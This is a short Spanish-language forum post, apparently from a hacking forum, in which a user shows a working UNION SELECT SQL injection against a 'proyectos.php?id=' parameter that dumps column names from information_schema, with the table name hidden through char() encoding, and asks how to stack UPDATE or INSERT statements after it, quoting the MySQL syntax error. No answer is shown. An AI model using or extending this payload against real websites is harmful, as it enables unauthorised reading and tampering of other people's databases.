Veran, tengo una inyeccion tal que asi:

proyectos.php?id=0 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12 from information_schema.columns where table_name=char(112,117,98,108,105,99,105,100,97,100)

eso como vereis, me saca campos de un tabla, es solo un ejemplo

mi duda, es si puedo, ejecutar otras sentencias que no sean select, quiero decir, insertar, actualizar...etc, no pregunto a nivel de privilegios ya que esos se pueden mirar en user privileges, sino a la manera de ejecutar la sentencia detras del select

¿alguien sabria como?, cuando lo intento me arroja:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';show databases' at line 1

ya, de eso estoy enterado, pero no es posible ejecutar una consulta tal que asi:

proyectos.php?id=0;update tabla....

es decir el ";" te cerraria la instruccion anterior para dar paso a otra

se podria realizar?

ok cogido